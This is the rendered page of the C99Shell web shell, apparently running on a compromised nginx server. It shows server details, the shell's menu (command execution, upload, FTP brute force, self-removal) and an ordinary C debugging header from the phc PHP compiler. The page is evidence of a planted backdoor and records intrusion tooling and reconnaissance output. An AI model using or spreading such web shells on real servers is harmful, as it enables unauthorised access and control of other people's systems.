!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/scripts/pba/phc-read-only/src/process_ir/   drwxrwxr-x
Free 83.21 GB of 96.73 GB (86.02%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     debug.h (1.21 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
 * phc -- the open source PHP compiler
 * See doc/license/README.license for licensing information
 *
 * Convenience debugging functions.
 */

/* XML_unparser takes a while to compile, and its use of
 * templates means it cant be separated. As a result, we want
 * to avoid include XML_unparser everywhere. Instead, we just
 * include this */

#ifndef PHC_DEBUG
#define PHC_DEBUG

#include <ostream>
namespace AST { class Node; }
namespace HIR { class Node; }
namespace MIR { class Node; }

#define CHECK_DEBUG() do { if (!debugging_enabled) return;} while (0)
#define DEBUG(A) do { if (debugging_enabled) { cdebug << A << std::endl; } } while (0)

void phc_pause ();

extern bool debugging_enabled;

/* Dump the XML for anynode to stderr. A global function. */
// TODO: These are split so they're easy to call from the debugger. But that
// doesn't seem to work in gdb.
void debug (AST::Node* in);
void xdebug (AST::Node* in);
void xadebug (AST::Node* in);

void debug (HIR::Node* in);
void xdebug (HIR::Node* in);
void xadebug (HIR::Node* in);

void debug (MIR::Node* in);
void xdebug (MIR::Node* in);
void xadebug (MIR::Node* in);

extern std::ostream& cdebug;
void enable_cdebug ();
void disable_cdebug ();

#endif // PHC_DEBUG

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0044 ]--